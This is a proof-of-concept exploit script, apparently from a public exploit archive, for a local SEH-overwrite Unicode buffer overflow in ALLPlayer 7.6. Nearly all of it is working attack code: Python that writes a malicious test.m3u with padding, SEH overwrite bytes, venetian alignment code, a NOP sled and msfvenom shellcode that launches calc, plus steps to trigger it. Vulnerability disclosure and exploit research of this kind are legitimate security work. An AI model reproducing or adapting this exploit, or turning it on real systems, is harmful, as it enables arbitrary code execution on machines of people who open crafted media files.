# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode) # Version: 7.6 # Date: 20-04-2020 # Exploit Author: Xenofon Vassilakopoulos # Tested on: Windows 7 Home Premium SP1 x86 # Steps to reproduce : # 1. generate the test.m3u using this exploit # 2. open ALLPlayer then go to Open audio file # 3. load the test.m3u file # 4. calc filename = "test.m3u" junk="A"*301 nseh = "\x61\x6e" # popad align seh = "\x12\x74" # pop ebx # pop ebp # ret 0x04 align=("\x56" # push esi "\x6e" # venetian shellcode "\x58" # pop eax "\x6e" # venetian shellcode "\x05\x19\x11" # add eax,0x11001900 "\x6e" # venetian shellcode "\x2d\x16\x11" # sub eax,0x11001600 "\x6e" # venetian shellcode "\x50" # push eax "\x6e" # venetian shellcode "\xc3" # retn ) nop="\x90"*45 # msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python shellcode= b"" shellcode+= b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" shellcode+= b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" shellcode+= b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" shellcode+= b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" shellcode+= b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" shellcode+= b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" shellcode+= b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" shellcode+= b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" shellcode+= b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" shellcode+= b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x69\x58\x62\x62" shellcode+= b"\x49\x70\x69\x70\x4d\x30\x71\x50\x63\x59\x48\x65\x6e" shellcode+= b"\x51\x57\x50\x52\x44\x54\x4b\x32\x30\x6e\x50\x54\x4b" shellcode+= b"\x72\x32\x6a\x6c\x54\x4b\x70\x52\x6d\x44\x72\x6b\x61" shellcode+= b"\x62\x6f\x38\x4a\x6f\x45\x67\x4e\x6a\x6d\x56\x4d\x61" shellcode+= b"\x69\x6f\x34\x6c\x4f\x4c\x51\x51\x53\x4c\x79\x72\x4c" shellcode+= b"\x6c\x6d\x50\x66\x61\x58\x4f\x4c\x4d\x59\x71\x67\x57" shellcode+= b"\x38\x62\x39\x62\x62\x32\x6e\x77\x74\x4b\x4e\x72\x4c" shellcode+= b"\x50\x34\x4b\x50\x4a\x4f\x4c\x72\x6b\x30\x4c\x4e\x31" shellcode+= b"\x51\x68\x38\x63\x61\x38\x79\x71\x36\x71\x70\x51\x62" shellcode+= b"\x6b\x71\x49\x6b\x70\x69\x71\x66\x73\x54\x4b\x31\x39" shellcode+= b"\x6c\x58\x37\x73\x6e\x5a\x6e\x69\x32\x6b\x6e\x54\x64" shellcode+= b"\x4b\x5a\x61\x59\x46\x50\x31\x49\x6f\x74\x6c\x69\x31" shellcode+= b"\x48\x4f\x6a\x6d\x7a\x61\x59\x37\x70\x38\x59\x50\x61" shellcode+= b"\x65\x4a\x56\x4c\x43\x71\x6d\x4c\x38\x6d\x6b\x43\x4d" shellcode+= b"\x4f\x34\x42\x55\x67\x74\x31\x48\x44\x4b\x32\x38\x4c" shellcode+= b"\x64\x6b\x51\x5a\x33\x61\x56\x62\x6b\x6c\x4c\x6e\x6b" shellcode+= b"\x44\x4b\x6f\x68\x4b\x6c\x7a\x61\x6a\x33\x64\x4b\x6b" shellcode+= b"\x54\x52\x6b\x49\x71\x36\x70\x42\x69\x4e\x64\x6b\x74" shellcode+= b"\x6f\x34\x6f\x6b\x61\x4b\x51\x51\x72\x39\x4f\x6a\x4f" shellcode+= b"\x61\x59\x6f\x47\x70\x71\x4f\x4f\x6f\x4e\x7a\x32\x6b" shellcode+= b"\x6e\x32\x4a\x4b\x52\x6d\x61\x4d\x72\x4a\x6a\x61\x32" shellcode+= b"\x6d\x42\x65\x75\x62\x49\x70\x79\x70\x4b\x50\x62\x30" shellcode+= b"\x52\x48\x4d\x61\x72\x6b\x42\x4f\x35\x37\x49\x6f\x4a" shellcode+= b"\x35\x37\x4b\x6c\x30\x64\x75\x53\x72\x61\x46\x31\x58" shellcode+= b"\x45\x56\x56\x35\x45\x6d\x33\x6d\x49\x6f\x59\x45\x4f" shellcode+= b"\x4c\x59\x76\x73\x4c\x6a\x6a\x75\x30\x69\x6b\x47\x70" shellcode+= b"\x30\x75\x7a\x65\x35\x6b\x4e\x67\x7a\x73\x50\x72\x52" shellcode+= b"\x4f\x6f\x7a\x69\x70\x30\x53\x49\x6f\x6a\x35\x51\x53" shellcode+= b"\x70\x61\x32\x4c\x6f\x73\x49\x70\x41\x41" payload=junk+nseh+seh+align+nop+shellcode fill="D"*(5000-len(payload)) payload+=fill f=open(filename,"wb") f.write('http://'+payload) print "\nFile created with %d bytes" % len(payload) f.close()